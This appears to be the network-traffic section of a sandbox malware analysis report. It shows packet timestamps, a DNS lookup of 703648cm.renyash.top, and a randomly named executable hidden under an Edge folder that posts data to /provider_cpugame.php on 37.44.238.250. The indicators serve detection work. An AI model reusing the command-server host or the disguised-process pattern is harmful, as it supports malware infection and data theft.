                                                                                                                      Dec 20, 2024 21:18:30.906888008 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:31.216609001 CET804983737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:31.269823074 CET4983780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:43.176070929 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:43.201946020 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:43.202289104 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:43.565392017 CET804987237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:43.613574982 CET4987280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:43.804444075 CET804987237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:43.846937895 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:43.847678900 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:43.847939968 CET4987280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:43.924041986 CET4987280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:43.925056934 CET4987880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:43.967798948 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.044297934 CET804987237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.044400930 CET4987280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:44.044608116 CET804987837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.044702053 CET4987880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:44.044912100 CET4987880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:44.164412975 CET804987837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.192023039 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:44.261377096 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.311536074 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.311626911 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.316674948 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:44.394951105 CET4987880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:44.514805079 CET804987837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.514815092 CET804987837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.514914036 CET804987837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.962754011 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.963572979 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.083676100 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:45.316812992 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.318016052 CET804987837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:45.363801956 CET4987880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.370719910 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:45.426172972 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.437163115 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:45.437180996 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:45.552259922 CET804987837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:45.597942114 CET4987880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.674843073 CET4987880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.675700903 CET4988480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.794871092 CET804987837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:45.796068907 CET804988437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:45.796288967 CET4988480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.796289921 CET4987880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.796358109 CET4988480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.916204929 CET804988437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:46.109808922 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:46.110872984 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:46.144993067 CET4988480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:46.230436087 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:46.264636993 CET804988437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:46.264647961 CET804988437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:46.264664888 CET804988437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:46.457535982 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:46.517581940 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:46.566777945 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:46.578519106 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:46.578632116 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.066512108 CET804988437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.113562107 CET4988480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.244147062 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.244997025 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.300102949 CET804988437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.347934008 CET4988480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.364469051 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.423685074 CET4988480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.424518108 CET4988980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.543936968 CET804988437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.543998003 CET4988480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.544363976 CET804988937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.544493914 CET4988980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.544636965 CET4988980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.598011971 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.651654959 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.664681911 CET804988937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.691695929 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.717544079 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.717675924 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.894881010 CET4988980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:48.014542103 CET804988937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:48.014552116 CET804988937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:48.014559984 CET804988937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:48.401667118 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:48.402759075 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:48.522500992 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:48.754288912 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:48.810122013 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:48.815921068 CET804988937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:48.863554001 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:48.863558054 CET4988980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:48.873967886 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:48.874234915 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.048188925 CET804988937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.097965956 CET4988980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:49.174130917 CET4988980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:49.174969912 CET4989380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:49.294276953 CET804988937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.294384956 CET4988980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:49.295243025 CET804989337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.295357943 CET4989380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:49.295562029 CET4989380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:49.415009975 CET804989337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.600807905 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.601588011 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:49.645193100 CET4989380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:49.721492052 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.764755011 CET804989337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.764797926 CET804989337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.764898062 CET804989337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.957564116 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:50.010785103 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:50.066739082 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:50.077265024 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:50.077294111 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:50.565597057 CET804989337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:50.613569021 CET4989380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:50.729455948 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:50.730350018 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:50.804681063 CET804989337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:50.847933054 CET4989380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:50.849857092 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:50.923460007 CET4989380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:50.924357891 CET4989780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:51.043512106 CET804989337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.043586969 CET4989380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:51.044164896 CET804989737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.044239998 CET4989780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:51.044424057 CET4989780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:51.082365990 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:51.140605927 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.165436983 CET804989737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.191826105 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:51.203932047 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.204097986 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.395019054 CET4989780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:51.516223907 CET804989737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.516241074 CET804989737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.516355991 CET804989737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.855381966 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.856213093 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:51.976161003 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:52.207683086 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:52.263573885 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:52.316674948 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:52.325829983 CET804989737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:52.327455044 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:52.327591896 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:52.379175901 CET4989780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:52.561688900 CET804989737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:52.613550901 CET4989780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:04.530330896 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:04.631318092 CET804993537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:04.676064014 CET4993580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:04.864053965 CET804993537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:04.910451889 CET4993580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:04.986769915 CET4993580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:04.987562895 CET4994080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:05.106534958 CET804993537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.106703997 CET4993580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:05.107156992 CET804994037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.107233047 CET4994080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:05.107431889 CET4994080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:05.196027040 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.197107077 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:05.226891041 CET804994037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.316528082 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.458259106 CET4994080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:05.551542044 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:05.578016043 CET804994037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.578027010 CET804994037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.578083038 CET804994037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.603972912 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.644787073 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:05.671188116 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:05.671196938 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.383505106 CET804994037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.390378952 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.391186953 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.426136017 CET4994080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.510945082 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.616213083 CET804994037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.660418987 CET4994080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.736040115 CET4994080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.736596107 CET4994680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.740051985 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.797950983 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.848037958 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.856179953 CET804994037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.856256962 CET4994080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.856317997 CET804994637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.856408119 CET4994680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.856707096 CET4994680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:06.859775066 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.859854937 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:06.976238966 CET804994637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:07.207386017 CET4994680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:07.327073097 CET804994637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:07.327086926 CET804994637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:07.327104092 CET804994637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:07.520291090 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:07.521712065 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:07.641469955 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:07.879290104 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:07.928395033 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:07.972929955 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:07.999397993 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:07.999442101 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:08.127427101 CET804994637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:08.176141977 CET4994680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:08.364594936 CET804994637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:08.410525084 CET4994680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:08.487819910 CET4994680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:08.489484072 CET4994980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:08.607454062 CET804994637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:08.607590914 CET4994680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:08.608915091 CET804994937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:08.610306025 CET4994980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:08.610519886 CET4994980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:08.657363892 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:08.659593105 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:08.730113983 CET804994937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:08.779086113 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:08.957770109 CET4994980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:09.004285097 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:09.077552080 CET804994937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:09.077611923 CET804994937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:09.077641964 CET804994937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:09.084177971 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:09.123972893 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:09.124123096 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:09.129173994 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:09.775857925 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:09.776954889 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:09.881637096 CET804994937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:09.898849964 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:09.926294088 CET4994980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.116483927 CET804994937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:10.130251884 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.160451889 CET4994980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.187144995 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:10.238564014 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.238570929 CET4994980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.242077112 CET4995480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.249804974 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:10.249917030 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:10.358705044 CET804994937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:10.359121084 CET4994980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.361643076 CET804995437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:10.361809969 CET4995480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.362140894 CET4995480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.481576920 CET804995437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:10.737970114 CET4995480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:10.990228891 CET4995480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:11.106903076 CET804995437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.106914043 CET804995437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.106923103 CET804995437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.107099056 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.109719038 CET804995437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.110819101 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:11.231657982 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.457765102 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:11.519325018 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.566687107 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:11.577449083 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.577457905 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.634597063 CET804995437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.676045895 CET4995480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:11.872221947 CET804995437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.926054955 CET4995480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:11.978599072 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:11.980199099 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:11.994209051 CET4995480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:11.995505095 CET4996180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:12.100110054 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:12.114412069 CET804995437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:12.114517927 CET4995480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:12.115277052 CET804996137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:12.118818998 CET4996180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:12.122773886 CET4996180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:12.242414951 CET804996137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:12.332703114 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:12.386504889 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:12.441701889 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:12.452394009 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:12.452451944 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:12.473037958 CET4996180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:12.592888117 CET804996137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:12.592902899 CET804996137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:12.592911005 CET804996137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:13.112950087 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:13.116998911 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:13.236531019 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:13.391532898 CET804996137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:13.441672087 CET4996180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:13.473279953 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:13.523823977 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:13.566660881 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:13.592801094 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:13.592950106 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:13.625479937 CET804996137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:13.676095963 CET4996180192.168.2.437.44.238.250
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 21:17:25.979603052 CET | 51082 | 53 | 192.168.2.4 | 1.1.1.1
Dec 20, 2024 21:17:26.453417063 CET | 53 | 51082 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 21:17:25.979603052 CET | 192.168.2.4 | 1.1.1.1 | 0x6d3e | Standard query (0) | 703648cm.renyash.top | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 21:17:26.453417063 CET | 1.1.1.1 | 192.168.2.4 | 0x6d3e | No error (0) | 703648cm.renyash.top |  | 37.44.238.250 | A (IP address) | IN (0x0001) | false

• 703648cm.renyash.top

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe

Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 21:17:26.583430052 CET | 311 | OUT | POST /provider_cpugame.php HTTP/1.1
